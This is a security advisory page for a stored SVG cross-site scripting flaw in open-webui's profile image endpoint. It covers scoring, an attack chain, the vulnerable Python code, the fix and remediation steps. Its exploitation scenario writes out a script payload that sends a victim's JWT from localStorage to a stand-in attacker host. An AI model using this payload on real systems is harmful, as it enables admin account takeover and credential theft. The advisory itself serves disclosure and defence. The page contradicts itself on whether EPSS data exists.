CVE-2026-45299: open-webui: Stored SVG XSS enables admin JWT theft

GHSA-6gh2-q7cp-9qf6 MEDIUM
Published May 14, 2026
CISO Take

Open-webui's profile image API accepted arbitrary data: URIs without MIME-type validation and re-served them with user-controlled Content-Type headers, allowing any authenticated user to embed JavaScript in an SVG payload that executes in the application origin when administrators or other users load it. The practical impact is full admin account takeover: the malicious script reads JWTs from localStorage and exfiltrates them, giving the attacker access to model API keys, system prompts, and all managed user data in the LLM interface. Open-webui carries 91 prior CVEs in the same package and is widely deployed as a self-hosted frontend for local LLMs — broadening the attack surface even though this CVE is not in CISA KEV and lacks EPSS data. Exploitation requires only a low-privilege account and standard XSS techniques with no AI-specific knowledge needed, making this accessible to insider threats or any compromised user account. Patch to open-webui v0.8.0 immediately; if patching is delayed, audit the database for profile_image_url values containing data:image/svg+xml or data:text/html and block the /api/v1/users/*/profile/image endpoint at the WAF or network perimeter.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

CVSS 5.4 Medium (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N) understates operational risk for multi-user deployments. The changed scope (S:C) combined with achievable admin JWT theft represents a higher functional impact than the base score reflects. Low attack complexity and low-privilege requirement (PR:L) make this accessible to insider threats or any compromised user account. Mitigating factors include the required user interaction (victim must load the attacker profile image), absence of public exploit code, no CISA KEV listing, and no available EPSS data. Effective risk: HIGH for production multi-user open-webui instances; LOW for single-user or network-isolated deployments.

How does the attack unfold?

Initial Access
Attacker registers a low-privilege account on the target open-webui instance via free registration or a previously compromised credential.
AML.T0021
Payload Staging
Attacker crafts a base64-encoded data:image/svg+xml URI embedding JavaScript to exfiltrate localStorage tokens and sets it as their profile_image_url via the profile update API.
AML.T0049
Exploitation
A victim (e.g., administrator) loads any page rendering the attacker's avatar; the server re-serves the SVG with user-controlled Content-Type inline, executing the JavaScript in the application origin and exfiltrating the victim's JWT to the attacker.
AML.T0055
Account Takeover
Attacker replays the stolen JWT to authenticate as the victim administrator, gaining full access to AI model configurations, API keys, system prompts, and all user conversation data.
AML.T0091.000

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Open WebUI pip < 0.8.0 0.8.0
143.3K Pushed 8d ago 77% patched ~5d to patch Full package profile →

Do you use Open WebUI? You're affected.

How severe is it?

CVSS 3.1
5.4 / 10
EPSS
0.2%
chance of exploitation in 30 days
Higher than 10% of all CVEs
Exploitation Status
No known exploitation
Sophistication
Trivial

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR Low
UI Required
S Changed
C Low
I Low
A None

What should I do?

6 steps
  1. Patch immediately to open-webui >= v0.8.0 (released 2026-02-11, commit 773787c74).

  2. If patching is delayed, audit the database: SELECT id, profile_image_url FROM users WHERE profile_image_url LIKE 'data:image/svg+xml%' OR profile_image_url LIKE 'data:text/html%' — null out any hits and revoke associated session tokens immediately.

  3. Block or restrict /api/v1/users/*/profile/image at the WAF or reverse proxy and configure it to reject responses with Content-Type: image/svg+xml.

  4. Add a Content-Security-Policy header with restrictive script-src to limit JavaScript execution as defense-in-depth.

  5. Rotate JWT secrets and invalidate all active sessions if malicious profile images are found in the database.

  6. Monitor access logs for requests to the profile image endpoint that returned SVG content types.

What does CISA's SSVC say?

Decision Track
Exploitation none
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15(5) - Accuracy, robustness and cybersecurity — resilience against unauthorised access
ISO 42001
A.9.3 - Information security controls for AI systems
NIST AI RMF
MANAGE-2.4 - Mechanisms are in place to address residual risks in deployed AI systems
OWASP LLM Top 10
LLM02:2025 - Sensitive Information Disclosure LLM05:2025 - Improper Output Handling

Frequently Asked Questions

What is CVE-2026-45299?

Open-webui's profile image API accepted arbitrary data: URIs without MIME-type validation and re-served them with user-controlled Content-Type headers, allowing any authenticated user to embed JavaScript in an SVG payload that executes in the application origin when administrators or other users load it. The practical impact is full admin account takeover: the malicious script reads JWTs from localStorage and exfiltrates them, giving the attacker access to model API keys, system prompts, and all managed user data in the LLM interface. Open-webui carries 91 prior CVEs in the same package and is widely deployed as a self-hosted frontend for local LLMs — broadening the attack surface even though this CVE is not in CISA KEV and lacks EPSS data. Exploitation requires only a low-privilege account and standard XSS techniques with no AI-specific knowledge needed, making this accessible to insider threats or any compromised user account. Patch to open-webui v0.8.0 immediately; if patching is delayed, audit the database for profile_image_url values containing data:image/svg+xml or data:text/html and block the /api/v1/users/*/profile/image endpoint at the WAF or network perimeter.

Is CVE-2026-45299 actively exploited?

No confirmed active exploitation of CVE-2026-45299 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-45299?

1. Patch immediately to open-webui >= v0.8.0 (released 2026-02-11, commit 773787c74). 2. If patching is delayed, audit the database: SELECT id, profile_image_url FROM users WHERE profile_image_url LIKE 'data:image/svg+xml%' OR profile_image_url LIKE 'data:text/html%' — null out any hits and revoke associated session tokens immediately. 3. Block or restrict /api/v1/users/*/profile/image at the WAF or reverse proxy and configure it to reject responses with Content-Type: image/svg+xml. 4. Add a Content-Security-Policy header with restrictive script-src to limit JavaScript execution as defense-in-depth. 5. Rotate JWT secrets and invalidate all active sessions if malicious profile images are found in the database. 6. Monitor access logs for requests to the profile image endpoint that returned SVG content types.

What systems are affected by CVE-2026-45299?

This vulnerability affects the following AI/ML architecture patterns: LLM chat interfaces, Self-hosted LLM deployments, Multi-user AI access management.

What is the CVSS score for CVE-2026-45299?

CVE-2026-45299 has a CVSS v3.1 base score of 5.4 (MEDIUM). The EPSS exploitation probability is 0.20%.

What is the AI security impact?

Affected AI Architectures

LLM chat interfacesSelf-hosted LLM deploymentsMulti-user AI access management

MITRE ATLAS Techniques

AML.T0021 Establish Accounts
AML.T0025 Exfiltration via Cyber Means
AML.T0049 Exploit Public-Facing Application
AML.T0055 Unsecured Credentials
AML.T0091.000 Application Access Token

Compliance Controls Affected

EU AI Act: Article 15(5)
ISO 42001: A.9.3
NIST AI RMF: MANAGE-2.4
OWASP LLM Top 10: LLM02:2025, LLM05:2025

What are the technical details?

Original Advisory

## Summary The `profile_image_url` field on the user profile update form accepted arbitrary `data:` URI values without MIME-type validation. Two distinct attack paths were independently demonstrated by separate reporters: 1. **`data:text/html;base64,...` in a new browser tab** (raresvis, 2025-04-17) — when a victim right-clicks a user's profile picture and chooses "Open image in new tab", the browser navigates to the data: URL and executes embedded scripts in the `data:` origin. Limited to social-engineering / redirect attacks because the script does not run in the application origin. 2. **`data:image/svg+xml;base64,...` re-served by the application origin** (Gh05t666nero, 2026-01-09) — `GET /api/v1/users/{user_id}/profile/image` decoded the base64 and returned `StreamingResponse(media_type=<user-controlled>)` extracted from the `data:` header. With `media_type=image/svg+xml` and `Content-Disposition: inline`, the SVG-embedded scripts executed in the **application origin**, enabling JWT theft from `localStorage` and full account takeover of any user — including admins — who loaded the malicious profile image URL. Both attack paths share the same root cause (lack of MIME-type validation on `profile_image_url`) and are closed by the same fix. ## Vulnerable code (v0.7.0) `backend/open_webui/routers/users.py` `get_user_profile_image_by_id()`: ```python elif user.profile_image_url.startswith("data:image"): header, base64_data = user.profile_image_url.split(",", 1) image_data = base64.b64decode(base64_data) image_buffer = io.BytesIO(image_data) media_type = header.split(";")[0].lstrip("data:") # user-controlled return StreamingResponse( image_buffer, media_type=media_type, headers={"Content-Disposition": "inline"}, ) ``` ## Fix Commit `773787c74` (2026-02-11), first contained in tag **v0.8.0**, applies the `validate_profile_image_url` field validator to every form that accepts `profile_image_url` (`UserModel`, `UpdateProfileForm`, `SignupForm` in `backend/open_webui/models/users.py` and `backend/open_webui/models/auths.py`). The validator explicitly rejects `data:image/svg+xml` and any non-image data URI, allowing only `data:image/{png,jpeg,gif,webp};base64` plus known internal paths and `http(s)://` URLs. This blocks both attack vectors at form submission time, so a malicious URL can no longer be persisted to the database. ## Credits - **raresvis** — discovered the `data:text/html`-via-new-tab path - **Gh05t666nero** — discovered the `data:image/svg+xml`-via-server-side path (the more severe origin-XSS vector that determined the consolidated CVSS) Per our Report Handling policy, the cluster is consolidated into the earliest filing with credit to every reporter who demonstrated a distinct exploitation path. ## Affected / patched versions - Affected: `< 0.8.0` - Patched: `>= 0.8.0`

Exploitation Scenario

An attacker registers a low-privilege account on a multi-user open-webui instance via free registration or a compromised credential. Using the profile update API (PUT /api/v1/users/update), they set their profile_image_url to a base64-encoded data:image/svg+xml URI containing embedded JavaScript: <svg><script>fetch('https://attacker.example/?t='+localStorage.getItem('token'))</script></svg>. When an administrator or other user loads any page displaying the attacker's avatar — such as a shared conversation thread, the admin user management panel, or a team workspace view — their browser requests GET /api/v1/users/{attacker_id}/profile/image. The vulnerable server decodes the base64 payload, extracts the MIME type directly from the data: header (fully user-controlled), and returns the raw SVG with Content-Disposition: inline and Content-Type: image/svg+xml. Since the response is served from the application origin, the browser executes the embedded JavaScript in that origin, exfiltrating the victim's JWT to the attacker. The attacker replays the stolen JWT to authenticate as the victim administrator and gains full access to all AI models, API keys, system prompts, and user data.

Weaknesses (CWE)

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

  • [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
  • [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. HTML body Element attributes (such as src="XYZ") URIs JavaScript sections Casca

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Timeline

Published
May 14, 2026
Last Modified
May 14, 2026
First Seen
May 15, 2026

Related Vulnerabilities